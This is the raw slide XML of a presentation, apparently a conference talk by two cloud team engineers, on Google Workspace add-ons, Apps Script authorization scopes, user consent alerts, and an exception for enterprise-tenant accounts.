                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Sous-titre 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F65D9684-D1F1-D0B0-7E23-D93BE0AC6C13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563639" y="1129607"/>
            <a:ext cx="7699212" cy="931949"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Platform that allows developers to create and distribute add-ons and extensions for Google Workspace applications:</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="90000"/>
                    <a:lumOff val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>https://workspace.google.com/marketplace</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A158078-883A-267D-7DD6-C55597482331}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>17/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76EE590B-9551-F204-9CF9-3013C4C0D8D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1665979" y="2136103"/>
            <a:ext cx="6261990" cy="2884286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2547362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C27BB5-1701-6438-C5DF-406E7447D01F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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PlaceHolder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{089F3838-1844-5770-E599-207DF64E1F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457103" y="1884713"/>
            <a:ext cx="8346600" cy="1165668"/>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751"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova Rg"/>
              </a:rPr>
              <a:t>Authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" b="1" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova Rg"/>
              </a:rPr>
              <a:t> for Google Services</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="800" b="1" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Graphique 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F19B0AC-A107-5AA0-6CC0-645E70E72B12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7684560" y="4620960"/>
            <a:ext cx="1271880" cy="255600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="495775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48FD14D8-8908-6C79-0428-A03657532529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1902683" y="1219927"/>
            <a:ext cx="5695824" cy="1594711"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Nicolas Kovacs</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Team Leader Cloud Team</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>@lestutosdenico / Nicknam3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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Speakers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Sous-titre 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E6A32FA-403D-3ECF-A53F-9AE443BC8426}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1902683" y="3058884"/>
            <a:ext cx="5695824" cy="1351823"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000" anchor="t">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pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Sébastien Rolland</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>R&amp;D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Engineer Cloud Team</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>@Blindevy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 4" descr="Une image contenant personne, foule&#10;&#10;Description générée automatiquement">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E39C887E-6AB3-0400-5569-FCFDA7F41E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141" y="1219927"/>
            <a:ext cx="1390959" cy="1456101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 9" descr="Une image contenant personne, homme, foule&#10;&#10;Description générée automatiquement">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA9EF425-2EF9-11F1-D869-B253E7DD4F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140" y="3006744"/>
            <a:ext cx="1390960" cy="1456101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="ZoneTexte 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4A47D56-D7EB-D55E-9EF6-C39DA3A19C85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="431528" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>2/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="723763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err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> 1/2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Sous-titre 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B3CA2C7-2305-D825-41A9-DC84F3CBC5C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563639" y="1129607"/>
            <a:ext cx="7164825" cy="1442144"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Apps Script determines the authorization scopes automatically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>The analysis is based on a scan of the code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>If a script needs authorization, you'll see one of the authorization dialogs shown here when it is run:</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1100" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BCC2118-9B44-2024-B635-35356A494265}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="978824" y="2711083"/>
            <a:ext cx="3800472" cy="1645710"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43C5A752-D87E-487A-682B-2888D6846206}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5050632" y="2152487"/>
            <a:ext cx="3114544" cy="2884286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="ZoneTexte 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E693421-185C-E1F4-7493-2DDE650482EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>19/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="760857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err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> 2/2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Sous-titre 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B3CA2C7-2305-D825-41A9-DC84F3CBC5C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563640" y="1129607"/>
            <a:ext cx="4229816" cy="1442144"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>When the application is accessed by a user, Google displays two alerts:</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1100" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E7CBFCC-FDDB-648D-CC86-9077E1668085}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165281" y="1850679"/>
            <a:ext cx="3026534" cy="2860504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Image 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D208E4E4-3F34-0A37-EF6D-DAB8A9DAE27E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5062081" y="848603"/>
            <a:ext cx="2916638" cy="4100512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD2B07B6-389C-D33E-5E5B-3E0346B0E7AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>20/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1896829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Exception</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Sous-titre 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B3CA2C7-2305-D825-41A9-DC84F3CBC5C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563640" y="1129607"/>
            <a:ext cx="7451648" cy="727768"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>But Google makes an exception when the application is created in an enterprise tenant and accessed by an enterprise account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Image 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF9286A3-9DBF-B480-2C32-848F41A68F37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1052932" y="2109714"/>
            <a:ext cx="7380328" cy="2787565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
